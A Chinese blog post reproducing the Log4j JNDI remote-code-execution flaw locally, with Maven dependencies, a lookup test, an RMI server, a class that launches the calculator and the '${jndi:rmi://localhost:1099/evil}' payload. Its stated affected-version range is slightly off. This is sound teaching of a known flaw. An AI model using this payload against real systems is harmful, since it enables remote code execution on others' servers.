【java】Log4j漏洞本地复现,远程执行脚本

最新推荐文章于 2024-05-23 17:45:07 发布
最新推荐文章于 2024-05-23 17:45:07 发布
阅读量394 收藏 7
点赞数 11
文章标签: java log4j 单元测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Passer_hua/article/details/136083824
版权

在log4j 2.14.0之前的版本存在此漏洞。
首先导入依赖

<dependency>
	<groupId>org.apache.logging.log4j</groupId>
	<artifactId>log4j-api</artifactId>
	<version>2.14.0</version>
</dependency>
<dependency>
	<groupId>org.apache.logging.log4j</groupId>
	<artifactId>log4j-core</artifactId>
	<version>2.14.0</version>
</dependency>

编写测试类

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class TestLog4j {
    private static final Logger log = LogManager.getLogger(TestLog4j.class);

    public static void main(String[] args) {
        test("hello world");
        test("${java:version}");
    }

    public static void test(String username){
    	// 一段普通的打印错误日志的代码,{}是占位符
        log.error("print userName:{}",username);
    }

}

# 输出结果如下,可以看到日志将系统版本信息输出了。
00:04:24.278 [main] ERROR com.zxh.test.TestLog4j - print userName:hello world
00:04:24.280 [main] ERROR com.zxh.test.TestLog4j - print userName:Windows 10 10.0, architecture: amd64-64
00:04:24.280 [main] ERROR com.zxh.test.TestLog4j - print userName:Java version 1.8.0_152

如此就已经实现了远程执行脚本,有点类似sql注入。当然如此的执行脚本还只是恶作剧。

RMI远程过程调用

首先写一个RMI服务端。

// 此处以win10本机为例,准备了一段java执行打开计算器的脚本
public class EvilCode {

    static {
        System.out.println("EvilCode");
        try {
            for (int i = 0; i < 2; i++) {
                Runtime.getRuntime().exec("calc");
            }
        }catch (Exception e){
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        new EvilCode();
    }
}

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
	// 启动一个RMIServer
    public static void main(String[] args) {
        try {
            // 创建一个远程对象,并将其注册到RMI注册表中
            // 获取RMI注册表的实例,并绑定名称
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            System.out.println("RMI注册表已创建");
            Reference reference = new Reference("com.zxh.test.EvilCode", "com.zxh.test.EvilCode", null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("evil", referenceWrapper);
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

启动RMIServer。然后只需要将传入的参数修改成如下示例即可

 public static void main(String[] args) {
        test("${jndi:rmi://localhost:1099/evil}");
    }
果壳~
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
log4j远程执行漏洞,测试源码
12-22
解压即用
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
Apache Log4j2远程JNDI代码执行漏洞修复
shy_snow的专栏
12-15 3607
漏洞简介 Apache Log4j2远程代码执行漏洞 当打印的日志含有${字符串时程序会使用lookup解析要打印的字符串,执行任意远程代码,框架没有做相应的过滤导致注入。官网2021/12/13最新下载的2.15.0声明已经修复该问题Log4j – Apache Log4j Security Vulnerabilities 影响范围 Apache Log4j 2.x <=2.14.1 (官网2021/12/13最新下载的2.15.0中已经修复该问题) 修复措施 ..
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
log4j2漏洞简单复现
BING
06-06 2955
log4j2漏洞简单复现
Log4j远程代码执行漏洞
派大星的博客
09-21 2517
Log4j远程执行漏洞原理分析
log4j2远程执行漏洞原理以及解决方案
猿码优创
12-15 1万+
最新最全的Log4j2漏洞原理和最新解决方案 2021年12月9日,国内多家机构监测到Apache Log4j2存在任意代码执行漏洞,并紧急通报相关情况。由于Apache Log4j存在递归解析功能,未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最终在目标上执行任意代码。鉴于Apache Log4j本身涉及多种应用组件,猿码优创讲漏洞威胁等级:严重。 目前经过不懈努力,猿码优创已经给复现了。 产生原因:存在JNDI注入漏洞,..
Log4j漏洞复现
m1287578441的博客
06-08 2913
Log4j漏洞复现
log4j2远程执行代码漏洞.md
lov3r的博客
08-27 896
文中漏洞Demo复现代码我上传到github,大家可以自行下载进行实验(本Demo只是为了复现问题,请不要用于其他非法用途)还有一点给大家的建议:在工作和学习的过程中不要认为网络上看到的东西就是正确的,对任何事物和问题我们要保持一颗怀疑的心,自己多动手...
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 3万+
log4j2
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Log4j高危漏洞原理及复现
qq_51302564的博客
12-15 1万+
Log4j高危漏洞原理及复现 漏洞检测||复现环境 查看JDK版本,发现版本小于1.8u121 图3-7 查看JDK版本 查看log4j2版本,发现版本在2.x <= 2.14.1内 图3-8 查看log4j2版本 查看代码,发现存在log4j2相关的lookup语句 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w9LtKVys-1639577266999)(C:\Users\BLACKF~1\AppData\Local\Temp\ksohtml\wps3AFF.
docker中安装jenkins,并在node和cloud上跑通基于源码控制SCM的pipeline
qq_29022265的博客
05-19 1136
从安装jenkins到创建jenkins的node和cloud,最后再将scm和FreeStyle两种流水线跑通。
分布式锁2-Zookeeper分布式锁实战
qq_43676797的博客
05-19 292
使用curator操作Zookeeper进行实战;:Apache Curator包含一套高级API框架和工具类,它 是Apache ZooKeeper 的Java 客户端库。
Java高级面试精粹:问题与解答集锦(一)
最新发布
Layla_c的博客
05-23 852
答案多态是Java中的一个核心概念,它允许不同类的对象对同一消息做出响应,但具体的行为会根据对象的实际类型而有所不同。重载(Overloading):当多个方法具有相同的名称,但参数列表不同时,这称为方法重载。编译器根据方法调用时传递的参数类型和数量来确定调用哪个方法。重写(Overriding):当子类有一个与父类同名、同参数列表的方法时,子类可以提供特定的实现来覆盖父类的方法。运行时,Java虚拟机(JVM)会根据对象的实际类型调用相应的方法,这个过程称为动态绑定或晚期绑定。答案。
java数据结构与算法(验证二叉搜索树)
磐门的博客
05-17 388
节点返回空为ture,节点的值不在对应数据大小范围内返回false。将验证二叉搜索树计算同样可以转换为相同子问题,所以比较适合用递归。node为root的左节点时,max更新为root.val。node为root的右节点时,min更新为root.val。
log4j远程代码执行漏洞复现
08-14
很抱歉,我不能提供最新漏洞复现过程。我作为一个 AI 助手,遵循道德准则和法律法规,不参与、支持或提供与安全漏洞相关的活动。漏洞复现涉及到潜在的非法行为和对他人系统的攻击,这是不被允许的。 如果你对最新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值